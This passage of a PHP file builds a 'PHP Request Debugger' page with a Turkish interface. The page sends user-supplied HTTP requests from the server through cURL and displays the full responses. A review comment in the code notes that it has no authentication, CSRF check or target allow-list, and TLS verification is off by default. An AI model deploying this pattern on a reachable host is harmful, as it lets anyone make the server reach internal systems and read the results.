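        $bodyString = $rawBody;
    } elseif (!empty($params)) {
        $bodyString = http_build_query($params);
        if (!hasHeader($headers, 'Content-Type')) {
            $headers[] = 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8';
        }
    }

    // An empty Expect header keeps requests with a body from stalling on "100-continue"
    // with some servers.
    if (!hasHeader($headers, 'Expect')) {
        $headers[] = 'Expect:';
    }
    if (!hasHeader($headers, 'Connection')) {
        $headers[] = 'Connection: close';
    }
    if (!hasHeader($headers, 'User-Agent')) {
        $headers[] = 'User-Agent: PHP Request Debugger/1.0';
    }
    if ($bodyString !== '' && !hasHeader($headers, 'Content-Length')) {
        $headers[] = 'Content-Length: ' . strlen($bodyString);
    }

    $ch = curl_init();
    $options = [
        CURLOPT_URL => $requestUrl,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HEADER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_MAXREDIRS => 5,
        // Redirects are followed, so the protocol limit has to cover them as well.
        CURLOPT_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_CONNECTTIMEOUT => $connectTimeout,
        CURLOPT_TIMEOUT => $timeout,
        CURLOPT_ENCODING => '',
        CURLOPT_NOSIGNAL => true,
        CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
        CURLOPT_SSL_VERIFYPEER => $verifySsl,
        CURLOPT_SSL_VERIFYHOST => $verifySsl ? 2 : 0,
        CURLOPT_COOKIE => $cookies,
        CURLOPT_HTTPHEADER => $headers,
    ];
    switch ($method) {
        case 'GET':
            $options[CURLOPT_HTTPGET] = true;
            break;
        case 'POST':
            $options[CURLOPT_POST] = true;
            $options[CURLOPT_POSTFIELDS] = $bodyString;
            break;
        case 'HEAD':
            $options[CURLOPT_NOBODY] = true;
            $options[CURLOPT_CUSTOMREQUEST] = 'HEAD';
            break;
        default:
            $options[CURLOPT_CUSTOMREQUEST] = $method;
            $options[CURLOPT_POSTFIELDS] = $bodyString;
            break;
    }
    curl_setopt_array($ch, $options);

    $rawResponse = curl_exec($ch);
    $errno = curl_errno($ch);
    $error = curl_error($ch);
    $info = curl_getinfo($ch);
    // A failed transfer is reported through errno/error; the response parts stay empty.
    if ($rawResponse === false) {
        $rawResponse = '';
    }
    // CURLOPT_HEADER is on, so the header block and the body are separated by header_size.
    $headerSize = $info['header_size'] ?? 0;
    $responseHeaders = substr($rawResponse, 0, $headerSize);
    $responseBody = substr($rawResponse, $headerSize);
    curl_close($ch);

    return [
        'request_url' => $requestUrl,
        'method' => $method,
        'request_headers' => $headers,
        'request_body' => $bodyString,
        'errno' => $errno,
        'error' => $error,
        'info' => $info,
        'response_headers' => $responseHeaders,
        'response_body' => $responseBody,
    ];
}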
// Holds the array returned by sendRequest() after a form submission; stays null on a plain page load.
$result = null;
// Message of any Throwable raised while sending; shown in the error box of the template below.
$exceptionMessage = null;
// NOTE(review): no login, CSRF token or target allow-list is visible in this file. Whoever can
// reach the page can make this server issue requests and read the responses, so it belongs
// on localhost or behind authentication, not on a public host.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
try {
// The whole $_POST array is handed over unchanged; sendRequest() picks the keys it knows.
$result = sendRequest($_POST);
} catch (Throwable $e) {
$exceptionMessage = $e->getMessage();
}
}
?>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<title>PHP Request Debugger</title>
<style>
:root {
--bg: #0d1117;
--card: #161b22;
--border: #30363d;
--blue: #58a6ff;
--green: #2ea043;
--red: #f85149;
--text: #c9d1d9;
--muted: #8b949e;
}
* { box-sizing: border-box; }
body {
margin: 0;
padding: 24px;
background: var(--bg);
color: var(--text);
font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", sans-serif;
}
.box {
background: var(--card);
border: 1px solid var(--border);
border-radius: 10px;
padding: 20px;
margin-bottom: 18px;
}
h1, h2 {
margin-top: 0;
color: var(--blue);
}
.grid {
display: grid;
gap: 14px;
}
.grid-2 {
grid-template-columns: 2fr 1fr;
}
.grid-3 {
grid-template-columns: repeat(3, 1fr);
}
label {
display: block;
margin-bottom: 6px;
font-size: 13px;
color: var(--muted);
}
input, select, textarea, button {
width: 100%;
border-radius: 8px;
border: 1px solid var(--border);
background: #0d1117;
color: #fff;
padding: 12px;
font-size: 14px;
}
textarea {
min-height: 140px;
resize: vertical;
font-family: Consolas, monospace;
}
button {
background: var(--green);
border: none;
font-weight: 700;
cursor: pointer;
}
pre {
white-space: pre-wrap;
word-break: break-word;
background: #0b0f14;
border: 1px solid var(--border);
padding: 14px;
border-radius: 8px;
overflow: auto; }
.meta {
display: grid;
grid-template-columns: repeat(4, 1fr);
gap: 12px;
}
.meta .item {
background: #0b0f14;
border: 1px solid var(--border);
border-radius: 8px;
padding: 12px;
}
.k {
color: var(--muted);
font-size: 12px;
display: block;
margin-bottom: 4px;
}
.v {
font-weight: 700;
}
.error {
color: #fff;
background: rgba(248, 81, 73, 0.15);
border: 1px solid rgba(248, 81, 73, 0.4);
padding: 12px;
border-radius: 8px;
}
.ok {
color: #fff;
background: rgba(46, 160, 67, 0.15);
border: 1px solid rgba(46, 160, 67, 0.4);
padding: 12px;
border-radius: 8px;
}
</style>
</head> <body>
<div class="box">
<h1>PHP Request Debugger</h1>
<form method="POST">
<div class="grid grid-2">
<div>
<label>URL</label>
<input
type="text"
name="url"
value="<?= h($_POST['url'] ?? '') ?>"
placeholder="https://example.com/api/test"
required
>
</div>
<div>
<label>Method</label>
<select name="method">
<?php
$methods = ['GET', 'POST', 'PUT', 'PATCH', 'DELETE', 'HEAD'];
$currentMethod = strtoupper($_POST['method'] ?? 'GET');
foreach ($methods as $m) {
$sel = $currentMethod === $m ? 'selected' : '';
echo '<option ' . $sel . '>' . h($m) . '</option>';
}
?>
</select>
</div>
</div>
<div class="grid grid-3" style="margin-top:14px;">
<div>
<label>Connect Timeout (sn)</label>
<input type="number" name="connect_timeout" value="<?= h($_POST['connect_timeout'] ?? '10') ?>" min="1">
</div>
<div>
<label>Total Timeout (sn)</label>
<input type="number" name="timeout" value="<?= h($_POST['timeout'] ?? '30') ?>" min="1">
</div>
<div>
<label>Cookies</label>
<input type="text" name="cookies" value="<?= h($_POST['cookies'] ?? '') ?>" placeholder="session=abc123; foo=bar">
</div>
</div>
<div class="grid grid-2" style="margin-top:14px;">
<div>
<label>Form Params (satır başına key=value)</label>
<textarea name="params" placeholder="name=ali email=ali@example.com"><?= h($_POST['params'] ?? '') ?></textarea>
</div>
<div>
<label>Raw Body</label>
<textarea name="raw_body" placeholder='{"name":"ali"}'><?= h($_POST['raw_body'] ?? '') ?></textarea>
</div>
</div>
<div style="margin-top:14px;">
<label>Headers (satır başına Header: value)</label>
<textarea name="headers" placeholder="Accept: application/json X-Test: 1"><?= h($_POST['headers'] ?? '') ?></textarea>
</div>
<div style="margin-top:14px; margin-bottom:14px;">
<label>
<input type="checkbox" name="verify_ssl" value="1" <?= !empty($_POST['verify_ssl']) ? 'checked' : '' ?> style="width:auto; margin-right:8px;">
SSL doğrulaması açık
</label>
</div>
<button type="submit">İsteği Gönder</button>
</form>
</div>
<?php if ($exceptionMessage !== null): ?>
<div class="box">
<div class="error"><?= h($exceptionMessage) ?></div>
</div>
<?php endif; ?>
<?php if ($result !== null): ?>
<div class="box">
<h2>Özet</h2>
<?php if ($result['errno'] !== 0): ?>
<div class="error">
<strong>cURL Error #<?= h($result['errno']) ?>:</strong>
<?= h($result['error']) ?>
</div>
<?php else: ?>
<div class="ok">İstek tamamlandı.</div>
<?php endif; ?>
<div class="meta" style="margin-top:14px;">
<div class="item">
<span class="k">HTTP Code</span>
<span class="v"><?= h($result['info']['http_code'] ?? 0) ?></span>
</div>
<div class="item">
<span class="k">Total Time</span>
<span class="v"><?= h($result['info']['total_time'] ?? 0) ?> sn</span>
</div>
<div class="item">
<span class="k">Connect Time</span>
<span class="v"><?= h($result['info']['connect_time'] ?? 0) ?> sn</span>
</div>
<div class="item">
<span class="k">Redirect Count</span>
<span class="v"><?= h($result['info']['redirect_count'] ?? 0) ?></span>
</div>
</div>
</div>
<div class="box">
<h2>Request</h2>
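<pre><?=
    // The separators must be real "\n" escapes. Written as "nn" / "n" the literal letters were
    // printed between the request line, the headers and the body, and all headers were
    // joined into one run of text.
    h($result['method'] . ' ' . $result['request_url']) . "\n\n"
    . h(implode("\n", $result['request_headers'])) . "\n\n"
    . h($result['request_body'])
?></pre>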
</div>
<div class="box">
<h2>Response Headers</h2>
<pre><?= h($result['response_headers']) ?></pre>
</div>
<div class="box">
<h2>Response Body</h2>
<pre><?= h($result['response_body']) ?></pre>
</div>
<div class="box">
<h2>cURL Info</h2>
<pre><?= h(print_r($result['info'], true)) ?></pre>
</div>
<?php endif; ?>
</body>
</html>